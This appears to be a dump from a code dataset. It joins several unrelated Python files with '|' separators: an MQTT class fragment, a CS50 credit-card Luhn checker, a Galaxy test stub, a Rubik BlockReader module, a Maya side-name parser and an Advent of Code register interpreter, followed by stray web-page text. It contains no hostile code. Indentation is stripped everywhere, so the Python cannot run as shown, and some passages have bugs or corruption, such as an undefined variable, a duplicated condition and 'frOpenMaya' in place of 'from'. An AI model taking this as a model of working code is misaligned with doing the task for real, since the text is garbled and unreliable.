if duration == -1:
self.rx.loop_start() # changed from loop forever so nonblocking thread
self.listen_called = True
else:
self.rx.loop_start()
time.sleep(duration)
self.rx.loop_stop()
#network getter functions
def get_Color(self, user):
#getter function to return color for a given user
if user in self.network:
return self.network[user]["color"]
else:
return "white"
def get_Emoji_Tag(self,user):
# getter function to return emoji for a given user
if user in self.network:
return self.network[user]["emojiID"]
else:
return "/smileyface" |
from cs50 import get_string
from sys import exit
# Function for checking digits
def checkDigits(number):
revNumber = number[::-1]
total = 0
for i in range(countDigits):
oddStep = (i % 2 == 1)
currentDigit = int(revNumber[i])
# Add the sum of digits of double the number for every second number
if (oddStep):
total += sumDigits(str(2 * currentDigit))
# Simply add the current digit for every other number
else:
total += currentDigit
return total % 10 == 0
# Utility function for summing digits
def sumDigits(number):
total = 0
for n in number:
total += int(n)
return total
# Get input from user
cardNum = get_string("Number: ")
countDigits = len(cardNum)
# Initial check for valid number
if countDigits < 13:
print("INVALID")
exit(0)
firstDigit = int(cardNum[0])
secondDigit = int(cardNum[1])
# Initial validation
if countDigits == 15 and firstDigit == 3 and secondDigit in [4, 7]:
cardType = "AMEX"
elif countDigits == 16 and firstDigit == 5 and secondDigit > 0 and secondDigit < 6:
cardType = "MASTERCARD"
elif countDigits in [13, 16] and firstDigit == 4:
cardType = "VISA"
else:
print("INVALID")
exit(0)
if checkDigits(cardNum):
print(cardType)
else:
print("INVALID")
exit(0)
|
from biomaj2galaxy.config import get_instance
gi = get_instance('local')
def setup_package():
global gi
|
#!/usr/bin/env python3
#
# Copyright 2014 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = "Simone Campagna"
__all__ = [
'filelist',
'multiopen',
'BlockReader',
]
import numpy as np
import contextlib
import os
from ..errors import RubikError
from ..units import Memory
from ..shape import Shape
from ..py23 import BASE_STRING
from .dtypes import get_dtype
def filelist(filenames):
if isinstance(filenames, BASE_STRING):
filenames = (filenames, )
elif isinstance(filenames, (list, tuple)):
filenames = tuple(filenames)
else:
raise TypeError("invalid filename value {!r} of type {}: it must be str, tuple or list".format(filename, type(filename).__name__))
return filenames
@contextlib.contextmanager
def multiopen(filenames, mode):
filenames = filelist(filenames)
filehandles = tuple(open(filename, mode) for filename in filenames)
yield filehandles
for filehandle in filehandles:
filehandle.close()
class BlockReader(object):
"""BlockReader(...)
A BlockReader object allows to read blocks from a list of files
"""
DEFAULT_BLOCK_SIZE = Memory('1gb')
def __init__(self, count, dtype=None, buffer_size=None, max_memory=None):
if isinstance(count, Shape):
count = count.count()
if isinstance(count, (BASE_STRING, tuple)):
count = Shape(count).count()
self.count = count
dtype = get_dtype(dtype)
self.dtype = dtype
self.itemsize_b = dtype().itemsize
if buffer_size is not None:
buffer_size = Memory(buffer_size)
self.buffer_size = buffer_size
if max_memory is not None:
max_memory = Memory(max_memory)
self.max_memory = max_memory
self.filesize_b = self.count * self.itemsize_b
def check_files(self, filenames):
"""self.check_files(filenames) -> raise an exception if some file does
not exists or has wrong size"""
for filename in filenames:
if not os.path.exists(filename):
raise RubikError("file {} does not exists".format(filename))
filesize_b = os.stat(filename).st_size
if filesize_b != self.filesize_b:
if filesize_b < self.filesize_b:
status = "short"
else:
status = "long"
raise RubikError("file {f}: too {s}: it contains {ci}/{cb} items/bytes, expected {ei}/{eb}".format(
f=filename,
s=status,
ci=filesize_b // self.itemsize_b,
cb=filesize_b,
ei=self.filesize_b // self.itemsize_b,
eb=self.filesize_b))
def read(self, filenames):
"""self.read(filenames) -> iterates over read blocks
reads and yields blocks from filenames"""
filenames = filelist(filenames)
self.check_files(filenames)
if not filenames:
return
if self.max_memory is None:
max_memory_b = self.count * self.itemsize_b * len(filenames)
else:
max_memory_b = self.max_memory.get_bytes()
if self.buffer_size is None:
buffer_size = self.DEFAULT_BLOCK_SIZE.get_bytes()
else:
buffer_size = self.buffer_size.get_bytes()
max_buffer_size = min(max_memory_b // len(filenames), buffer_size)
block_count = max(1, max_buffer_size // self.itemsize_b)
expected_count = self.count
read_count = 0
with multiopen(filenames, 'rb') as filehandles:
while read_count < expected_count:
blocks = []
step_count = min(expected_count - read_count, block_count)
if step_count == 0:
break
for filename, filehandle in zip(filenames, filehandles):
#print "reading {} items from {}".format(step_count, filename)
block = np.fromfile(filehandle, dtype=self.dtype, count=step_count)
if block.size < step_count:
raise RubikError("file {}: too short, read {} items, expected {}".format(
filename, read_count + block.size, expected_count))
elif block.size < step_count:
raise RubikError("file {}: internal error, tring to read {} items, {} read".format(
filename, step_count, block.size))
blocks.append(block)
yield tuple(blocks)
read_count += step_count
for filename, filehandle in zip(filenames, filehandles):
if filehandle.read(1):
raise RubikError("file {}: too long, read {} items, expected {}".format(
filename, read_count + 1, expected_count))
def reduce(self, filenames, function, *n_args, **p_args):
"""self.reduce(filenames, function, *n_args, **p_args) -> reduce result
executes reduce 'function' on all the blocks read from 'filenames'.
'function' is a function expecting a tuple of blocks as first arguments,
and *n_args, *p_args as following optional arguments.
"""
result = None
for blocks in self.read(filenames):
result = function(blocks, *n_args, **p_args)
return result
|
"""
read_sides extracts the sides from strings provided.
proper nomenclature of using sides in Maya is _l_ or l_, _L_, L_, left_ or _left, Left_, and _Left.
Each class supports iteration and __getitem__ extraction.
"""
# import standard modules
import json
import os
import re
# define local variables
sides_file = os.path.join(os.path.dirname(__file__), "sides.json")
re_any_upper = re.compile('[A-Z]+')
def read_file():
"""
reads the sides json file.
"""
with open(sides_file, 'r') as s_file:
return json.load(s_file)
def strip_underscore(in_string="", strip=False):
"""
if true, strips any underscores from the incoming parameter.
:param in_string: <str> check this string for any underscores.
:param strip: <bool> if true, strip '_' from the string.
:return: <str> resultant string name.
"""
if strip:
return in_string.strip("_")
return in_string
def extract_side_from_string(s_dict={}, in_string="", index=False, with_underscore=True):
"""
extract the side from the string provided.
:param s_dict: <dict> input dictionary.
:param in_string: <str> input string.
:param index: <bool> gets the index of the side found.
:param with_underscore: <bool> return with underscore.
:return: <str> side.
"""
s_string = ""
s_index = -1
for k in s_dict:
side_name = '{}_'.format(k)
if in_string.startswith(side_name):
s_string = side_name
s_index = extract_side_index_from_string(in_string, s_string, start=True)
side_name = '_{}'.format(k)
if in_string.endswith(side_name):
s_string = side_name
s_index = extract_side_index_from_string(in_string, s_string, end=True)
side_name = '_{}_'.format(k)
if side_name in in_string:
s_string = side_name
s_index = extract_side_index_from_string(in_string, s_string)
if index:
return strip_underscore(s_string, not with_underscore), s_index
else:
return strip_underscore(s_string, not with_underscore)
def extract_side_index_from_string(in_string="", side="", start=False, end=False):
"""
extract the side from the string provided.
:param in_string: <dict> input the string to check.
:param side: <str> input string.
:param start: <bool> find at the start of the string.
:param end: <bool> find at the end of the string.
:return: <str> side.
"""
if start:
return re.search('^{}'.format(side), in_string).start()
if end:
return re.search('{}$'.format(side), in_string).end()
return in_string.find(side)
class Sides(object):
KEY = "sides"
SIDES = {}
START = 0
LENGTH = 0
def __init__(self):
self.SIDES = read_file()[self.KEY]
self.LENGTH = len(self.SIDES)
self.update_class()
def update_class(self):
"""
updates the current class with keys and values
"""
for k, v in self.SIDES.items():
self.__dict__[k] = v
def side_from_string(self, in_string=""):
"""
get the side from string collected.
:param in_string: <str> search for a side string name from this parameter.
:return: <str> the side string name.
"""
return extract_side_from_string(self.SIDES, in_string)
def side_name_from_string(self, in_string=""):
"""
get a uniform, title-cased side name from an incoming string object.
:param in_string: <str> check this string for a side name.
:return: <str> side name from string.
"""
side_name = extract_side_from_string(self.SIDES, in_string, with_underscore=False)
if len(side_name) == 1:
return self.SIDES[side_name].title()
return side_name.title()
def split(self):
"""
finds if there is an _ in the sides dictionary.
:return: <tuple> array of names with '_'.
"""
return tuple(filter(lambda x: '_' in x, self.SIDES))
def sides(self):
"""
get all the side keys in sides.json dictionary.
:return: <tuple> array of side names.
"""
return tuple(self.SIDES)
def items(self):
"""
array of side names.
:return: <list> array of side names with their corresponding letter/ letters.
"""
return self.SIDES.items()
def upper(self):
"""
return any name with upper case letters.
:return: <tuple> upper case letter names.
"""
return tuple(filter(lambda x: re_any_upper.search(x), self.SIDES))
def lower(self):
"""
return any name with lower case letters.
:return: <tuple> lower case letter names.
"""
return tuple(filter(lambda x: x.islower(), self.SIDES))
def upper_singles(self):
"""
return any name with upper case single letters.
:return: <tuple> upper case single letter names.
"""
return tuple(filter(lambda x: len(x) == 1, self.upper()))
def lower_singles(self):
"""
return any name with lower case single letters.
:return: <tuple> lower case single letter names.
"""
return tuple(filter(lambda x: len(x) == 1, self.lower()))
def lower_names(self):
"""
return any lower case names.
:return: <tuple> lower case names.
"""
return tuple(filter(lambda x: len(x) != 1, self.lower()))
def upper_names(self):
"""
return any upper case names.
:return: <tuple> upper case names.
"""
return tuple(filter(lambda x: len(x) != 1, self.upper()))
def __getitem__(self, item):
return self.__dict__[item]
def __repr__(self):
return str(self.SIDES)
def __iter__(self):
return self
def next(self):
num = self.START
self.START += 1
if num < self.LENGTH:
return self.SIDES[self.SIDES.keys()[num]]
else:
raise StopIteration("[Sides] :: Max length reached.")
class Axes(Sides):
KEY = "axes"
SIDES = []
def __init__(self):
super(Axes, self).__init__()
def update_class(self):
for k in self.SIDES:
self.__dict__[k] = None
def next(self):
num = self.START
self.START += 1
if num < self.LENGTH:
return self.SIDES[num]
else:
raise StopIteration("[Axes] :: Max length reached.")
class MirrorSides(Sides):
KEY = "mirror"
def __init__(self):
super(MirrorSides, self).__init__()
def side_from_string(self, in_string="", index=False):
"""
get the sides from a string value provided.
:param in_string: <str> input string to extract sides frOpenMaya.
:param index: <bool> if true, extract the position where the side string came frOpenMaya.
:return: <str> the side string value.
"""
return extract_side_from_string(self.SIDES, in_string, index=index)
def replace_side_string(self, in_string=""):
"""
replaces the side with the mirror side strings.
:param in_string: <str> input string.
:return: <str> output string with the replaced side string.
"""
side, index = self.side_from_string(in_string=in_string, index=True)
stripped_side_name = side.strip('_')
# see if there is a side to check first.
if stripped_side_name in self.__dict__:
mirror_side_name = side.replace(stripped_side_name, self[stripped_side_name])
split_str = list(in_string.partition(side))
if split_str.count(side):
split_index = split_str.index(side)
split_str[split_index] = split_str[split_index].replace(side, mirror_side_name)
return ''.join(split_str)
return in_string
|
#!/usr/bin/env python
import sys
def load_program(filename):
with open(filename, 'rb') as f:
return [l.strip().split() for l in f.readlines()]
def execute(prog, pc, registers):
cmd = prog[pc]
print 'Executing', cmd
inst = cmd[0]
if inst == 'cpy':
x = cmd[1]
if x in registers:
registers[cmd[2]] = registers[x]
else:
registers[cmd[2]] = int(x)
elif inst == 'inc':
registers[cmd[1]] = registers[cmd[1]] + 1
elif inst == 'dec':
registers[cmd[1]] = registers[cmd[1]] - 1
elif inst == 'jnz':
x = cmd[1]
if x in registers:
if registers[x]:
return pc + int(cmd[2])
elif int(x):
return pc + int(cmd[2])
return pc + 1
def main(argv=None):
if not argv:
argv = sys.argv
prog = load_program(argv[1])
print prog
registers = {'a':0, 'b':0, 'c':0, 'd':0}
pc = 0
while pc < len(prog):
pc = execute(prog, pc, registers)
print registers
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.